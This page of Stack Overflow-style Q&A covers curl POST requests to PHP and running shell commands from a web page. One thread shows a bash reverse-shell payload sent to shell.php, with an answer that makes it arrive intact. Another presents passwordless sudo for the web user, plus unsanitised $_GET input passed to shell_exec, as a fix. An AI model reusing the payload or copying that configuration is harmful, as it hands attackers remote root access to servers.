I created a website on centos 6. I posted a request to the website (it has a php file) from a bash script with this command:
curl -X POST -d text="example" "website"
However, I can not return a response from the php file to the bash script. How can I do this?
You are making a HTTP POST request with CURL but you haven't told it to return anything.
Try this:
curl -v -X POST -d text="example" "website"
This is telling the CURL to verbosely dump everything about the response (header and body).
Here's the documentation for command line usage: http://curl.haxx.se/docs/manpage.html
Related
I was testing by sending some data using curl -d and retrieve the data in a PHP script using $_POST['data'],
My request is like
curl https://localhost/shell.php -d "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
And the shell.php script is like:
var_dump($_POST['data']);
However, the output is truncated, I am only able to get:
shell_exec(\"/bin/bash -c '/bin/bash -i >
from $_POST['data'].
Can you try and escape \&
Like curl https://localhost/shell.php -d "data=shell_exec("/bin/bash -c '/bin/bash -i >\& /dev/tcp/192.168.0.1/8888 0>&1 ' ");"
?
The Cause
After doing some research, i think i find the root cause of this problem.
First, we have to understand some basic workflow of PHP runtime. When a http request is sent to fast-cgi, the workflow looks like below:
Some preprocess(i didn't research too much in this step)
Post request processed vim a bunch module:
cgi_main
SAPI
Some other code
PHP String Process
We can also find that there is a page about PHP default configuration and we can figure out that & is the default arg separator for input parameter.
According to all the information we have so far, we can conclude PHP runtime will receive the post data sent by curl and parse it automatically and during the process it will split parameter string based on the default separator.
In my case, if i sent the post request with -d, the & was not encoded and thus the data will be truncated by PHP at the first occurrence of &, which cause the following command to be abandoned.
The Solution
Use --data-url-encode instead of -d
curl https://localhost/shell.php --data-urlencode "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
Note
Some times we see something like PG, SG and EG. They are PHP common macros from:
PHP
ZEND
SAPI
On a local linux server (Rapsberry Pi debian stretch with desktop), I am working on sending "audtool" commands to a running Audacious media player using php, exec and bash scripts. Audacious is autostarted when the server starts up with user "pi". I have apache2 and php set up and working on the server, and I can ssh to the server and run all the commands from the cli. I believe I have resolved the issues with running audtool (dbus and setting the right environment variables) and running the php on the command line works successfully. However when running the php on a webpage I get back a long string of information about apache2
I have spent several hours (getting on for a whole day) researching this on the web in order to get to this stage, so close I can almost touch it, but stuck on this last element. The example is to display the current song from a running instance of Audacious. Audtool requires a running dbus (looks for a display). Using exec or shell_exec I have no problems running bash commands such as whoami or ls.
The php page (cursong.php):
<?php
echo exec('/var/www/html/cursong.sh');
?>
The bash script (cursong.sh):
#!/bin/bash
##call current song
pid=`pidof audacious`
user=`ps -p $pid -o user=`
export `strings /proc/$pid/environ | grep DBUS_SESSION_BUS_ADDRESS`
sudo -E -su $user /usr/bin/audtool --current-song
(from here: https://redmine.audacious-media-player.org/boards/1/topics/1058?r=1059)
Output from command line:
php -f cursong.php
Artist - Song Title (for example - so this works)
Output on webpage:
declare -x APACHE_LOCK_DIR="/var/lock/apache2" declare -x
APACHE_LOG_DIR="/var/log/apache2" declare -x
APACHE_PID_FILE="/var/run/apache2/apache2.pid" declare -x
APACHE_RUN_DIR="/var/run/apache2" declare -x APACHE_RUN_GROUP="www-
data" declare -x APACHE_RUN_USER="www-data" declare -x
INVOCATION_ID="4ce76136ca8842bd9108d6b1b9a5b9ed" declare -x
JOURNAL_STREAM="8:23896" declare -x LANG="C" declare -x OLDPWD
declare -x
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
declare -x PWD="/var/www/html" declare -x SHLVL="1"
I have set www-data, the apache2 user with the following in
/etc/sudoers:
www-data ALL=NOPASSWD: ALL
and /var/www/html is rwx for anyone
Obviously, I am expecting to see "Artist - Song Title" on the webpage, but instead I get back all the apache2 info. What am i missing, or where have I gone wrong?
I hate answering my own question, makes it look like I wasn't trying hard enough! After a further five hours or so of searching around and attempting fixes, I happened upon this post on SO:
Running command-line application from PHP as specific user
which suggested putting a "sudo -u user" in the exec of the php file. I tried this with the "pi" user and it still didn't work, then I simply tried it with "sudo" and hey presto!!
The php file now looks like this:
<?php
echo shell_exec('sudo /var/www/html/cursong.sh 2>&1');
?>
Now to do some testing on how it works with the other audtool commands that don't ask for a response but require action from audacious, and to see how I can reduce scripting php files by passing a parameter to the bash script!
Just for completeness, the php and bash scripts for both a request and an action, using a parameter fed to the php url and then on to the bash script:
PHP File with Parameter
<?php
$request = $_GET["request"];
echo shell_exec("sudo /var/www/html/cursong.sh \"${request}\" 2>&1");
?>
url example:
http://192.168.1.92/cursong.php?request="--playlist-shuffle-status"
Bash Script with parameter
#!/bin/bash
##call request
pid=`pidof audacious`
user=`ps -p $pid -o user=`
export `strings /proc/$pid/environ | grep DBUS_SESSION_BUS_ADDRESS`
sudo -E -su $user /usr/bin/audtool $1
PHP file for an action
<?php
$action = $_GET["action"];
shell_exec('sudo /var/www/html/playsong.sh \"${request}\" ');
?>
url example:
http://192.168.1.92/cursong.php?action="--playback-play"
Bash script for an action
#!/bin/bash
##call action
pid=`pidof audacious`
user=`ps -p $pid -o user=`
export `strings /proc/$pid/environ | grep DBUS_SESSION_BUS_ADDRESS`
sudo -E -su $user /usr/bin/audtool $1
I want to call my upload csv api using curl command but no able to upload file on that which gives me error.
Command I am using as follow:
curl -i -X POST -H "Content-Type:application/json" https://api.staging.mailzap.com/api/v1/api-key/upload-csv -d '{"apiKey":"Srkk8RL8xETAeJ0lTm85","email_csv":'#\"C:/Users/viral.champanery/Desktop/publicapi/test.txt\"',"team_id":282}'
following option also not working
curl -i -X POST -H "Content-Type:multipart/form-data;application/json;application/csv;" https://api.staging.mailzap.com/api/v1/api-key/upload-csv -d '{"apiKey":"Srkk8RL8xETAeJ0lTm85","email_csv":"C:/Users/viral.champanery/Desktop/publicapi/test.txt","team_id":282}'
also not working following
curl -i -X POST -H "Content-Type:multipart/form-data;application/json;application/csv;" https://api.staging.mailzap.com/api/v1/api-key/upload-csv -d '{"apiKey":"Srkk8RL8xETAeJ0lTm85","team_id":282}' -F "email_csv=#/C/Users/viral.champanery/Desktop/publicapi/test.csv"
email_csv=#/C/Users/viral.champanery/Desktop/publicapi/test.csv"
help me to upload file with json other parameter in api using curl command
So im trying to execute a terminal cURL command within a PHP script
The command in question
curl -H "public-api-token: mykeyhere" -X PUT -d "urlToShorten=google.com" https://api.shorte.st/v1/data/url
The response is a JSON and is as follows
{"status":"ok","shortenedUrl":"http:\/\/sh.st\/XXXX"}
I put it in my PHP script as follows, hoping it would add to a smaller and more effective code footprint
$cmd='curl -H "public-api-token: mysecretkey" -X PUT -d "urlToShorten=google.com" https://api.shorte.st/v1/data/url';
exec($cmd,$result);
print_r($result);
However the returned array is empty
The result is
Array ( )
exec() returns the last line of output, try using shell_exec().
I have a bash script on a cronjob.
do
curl -d "test=working" https:/mysite.com/test
echo "done"
done
Right now, it just makes a post request on my site.
But now I want to make a post request in a members only area 2 times
So how can I login keep the session, and post 2 times?
I can't test this as I'm on my phone for a while but it's been bugging me.
do
curl -d "uname=a&pass=b" https:/mysite.com/login
for run in {1..2}
do
curl -d "test=working" https:/mysite.com/memberarea
echo "done"
done
Would this work?
you can use the cookies:
curl -b cookies.txt -c cookies.txt -e website.com -d 'xx=yy' http://website.com/path/to/resource
The -b(--cookie) means use the cookie from cookies.txt,
and the -c(--cokie-jar) means dumps the cookie to cookies.txt.
so always add the two option when use curl in your script and so that you can keep the session.
FYI:
do
curl -b cookies.txt -c cookies.txt -e mysite.com -d "uname=a&pass=b" https:/mysite.com/login
for run in {1..2}
do
curl -b cookies.txt -c cookies.txt -e mysite.com -d "test=working" https:/mysite.com/memberarea
echo "done"
done
If your website uses cookie for keeping authenticated session, you can use --cookie name=data to pass the authentication username and password and use --cookie-jar <filename> to store the cookie.